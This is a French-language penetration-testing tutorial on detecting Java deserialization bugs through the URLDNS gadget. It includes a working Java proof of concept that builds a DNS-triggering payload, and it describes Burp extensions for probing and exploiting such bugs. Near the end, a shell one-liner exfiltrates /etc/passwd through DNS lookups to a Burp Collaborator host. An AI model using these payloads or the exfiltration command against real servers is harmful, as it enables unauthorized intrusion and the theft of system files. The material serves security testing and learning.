Requête DNS sur la désérialisation

La classe java.net.URL implémente Serializable, cela signifie que cette classe peut être sérialisée.

public final class URL implements java.io.Serializable {

Cette classe a un comportement curieux. D'après la documentation : "Deux hôtes sont considérés comme équivalents si les noms d'hôtes peuvent être résolus en mêmes adresses IP". Ainsi, chaque fois qu'un objet URL appelle l'une quelconque des fonctions equals ou hashCode, une requête DNS pour obtenir l'adresse IP va être envoyée.

Appeler la fonction hashCode à partir d'un objet URL est assez simple, il suffit d'insérer cet objet dans une HashMap qui va être désérialisée. Cela est dû au fait qu'à la fin de la fonction readObject de HashMap, ce code est exécuté :

private void readObject(java.io.ObjectInputStream s)
throws IOException, ClassNotFoundException {
[   ...   ]
for (int i = 0; i < mappings; i++) {
[   ...   ]
putVal(hash(key), key, value, false, false);
}

Il va exécuter putVal avec chaque valeur à l'intérieur du HashMap. Mais, plus pertinent est l'appel à hash avec chaque valeur. Voici le code de la fonction hash:

static final int hash(Object key) {
int h;
return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
}

Comme vous pouvez l'observer, lors de la désérialisation d'un HashMap, la fonction hash va être exécutée avec chaque objet et pendant l'exécution de hash, .hashCode() de l'objet va être exécuté. Par conséquent, si vous désérialisez un HashMap contenant un objet URL, l'objet URL va exécuter .hashCode().

Maintenant, examinons le code de URLObject.hashCode() :

public synchronized int hashCode() {
if (hashCode != -1)
return hashCode;

hashCode = handler.hashCode(this);
return hashCode;

Comme vous pouvez le voir, lorsque un URLObject exécute .hashCode(), il appelle hashCode(this). En continuant, vous pouvez voir le code de cette fonction :

protected int hashCode(URL u) {
int h = 0;

// Generate the protocol part.
String protocol = u.getProtocol();
if (protocol != null)
h += protocol.hashCode();

// Generate the host part.
InetAddress addr = getHostAddress(u);
[   ...   ]

Vous pouvez voir qu'un getHostAddress est exécuté vers le domaine, lançant une requête DNS.

Par conséquent, cette classe peut être abusée pour lancer une requête DNS afin de démontrer que la désérialisation est possible, voire pour exfiltrer des informations (vous pouvez ajouter en sous-domaine la sortie d'une exécution de commande).

Exemple de code de charge utile URLDNS

Vous pouvez trouver le code de charge utile URLDNS de ysoserial ici. Cependant, juste pour faciliter la compréhension de comment le coder, j'ai créé ma propre preuve de concept (basée sur celle de ysoserial) :

import java.io.File;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.net.InetAddress;
import java.net.URLConnection;
import java.net.URLStreamHandler;
import java.util.HashMap;
import java.net.URL;

public class URLDNS {
public static void GeneratePayload(Object instance, String file)
throws Exception {
//Serialize the constructed payload and write it to the file
File f = new File(file);
ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(f));
out.writeObject(instance);
out.flush();
out.close();
}
public static void payloadTest(String file) throws Exception {
//Read the written payload and deserialize it
ObjectInputStream in = new ObjectInputStream(new FileInputStream(file));
Object obj = in.readObject();
System.out.println(obj);
in.close();
}

public static void main(final String[] args) throws Exception {
String url = "http://3tx71wjbze3ihjqej2tjw7284zapye.burpcollaborator.net";
HashMap ht = new HashMap(); // HashMap that will contain the URL
URLStreamHandler handler = new SilentURLStreamHandler();
URL u = new URL(null, url, handler); // URL to use as the Key
ht.put(u, url); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup.

// During the put above, the URL's hashCode is calculated and cached.
// This resets that so the next time hashCode is called a DNS lookup will be triggered.
final Field field = u.getClass().getDeclaredField("hashCode");
field.setAccessible(true);
field.set(u, -1);

//Test the payloads
GeneratePayload(ht, "C:\\Users\\Public\\payload.serial");
}
}


class SilentURLStreamHandler extends URLStreamHandler {

protected URLConnection openConnection(URL u) throws IOException {
return null;
}

protected synchronized InetAddress getHostAddress(URL u) {
return null;
}
}

Plus d'informations

• https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/

• Dans l'idée originale, la charge utile de commons collections a été modifiée pour effectuer une requête DNS, ce qui était moins fiable que la méthode proposée, mais voici le lien vers l'article : https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/

GadgetProbe

Vous pouvez télécharger GadgetProbe depuis le Burp Suite App Store (Extender).

GadgetProbe va essayer de déterminer si certaines classes Java existent sur la classe Java du serveur afin de savoir si il est vulnérable à une certaine exploitation connue.

Comment ça marche

GadgetProbe utilisera la même charge utile DNS de la section précédente mais avant d'exécuter la requête DNS, il va essayer de désérialiser une classe arbitraire. Si la classe arbitraire existe, la requête DNS sera envoyée et GadgetProbe notera que cette classe existe. Si la requête DNS n'est jamais envoyée, cela signifie que la classe arbitraire n'a pas été désérialisée avec succès, donc soit elle n'est pas présente, soit elle n'est pas sérialisable/exploitable.

Sur le github, GadgetProbe a des listes de mots avec des classes Java à tester.

Plus d'informations

• https://know.bishopfox.com/research/gadgetprobe

Scanner de désérialisation Java

Ce scanner peut être téléchargé depuis le Burp App Store (Extender). L'extension a des capacités passives et actives.

Passif

Par défaut, il vérifie passivement toutes les requêtes et réponses envoyées à la recherche de bytes magiques sérialisés Java et affichera un avertissement de vulnérabilité s'il en trouve :

Actif

Test manuel

Vous pouvez sélectionner une requête, faire un clic droit et Envoyer la requête à DS - Test manuel. Ensuite, dans l'onglet Scanner de désérialisation --> Onglet de test manuel, vous pouvez sélectionner le point d'insertion. Et lancer le test (Sélectionnez l'attaque appropriée en fonction de l'encodage utilisé).

Même si cela s'appelle "Test manuel", c'est assez automatisé. Il vérifiera automatiquement si la désérialisation est vulnérable à n'importe quelle charge utile ysoserial en vérifiant les bibliothèques présentes sur le serveur web et mettra en évidence celles qui sont vulnérables. Pour vérifier les bibliothèques vulnérables, vous pouvez choisir de lancer des Javas Sleeps, des sleeps via une consommation CPU, ou en utilisant DNS comme mentionné précédemment.

Exploitation

Une fois que vous avez identifié une bibliothèque vulnérable, vous pouvez envoyer la requête à l'onglet Exploitation. Dans cet onglet, vous devez sélectionner à nouveau le point d'injection, écrire la bibliothèque vulnérable pour laquelle vous voulez créer une charge utile, et la commande. Ensuite, appuyez simplement sur le bouton Attaque approprié.

Informations sur l'exfiltration DNS de la désérialisation Java

Faites en sorte que votre charge utile exécute quelque chose comme suit :

(i=0;tar zcf - /etc/passwd | xxd -p -c 31 | while read line; do host $line.$i.cl1k22spvdzcxdenxt5onx5id9je73.burpcollaborator.net;i=$((i+1)); done)

Plus d'informations

• https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/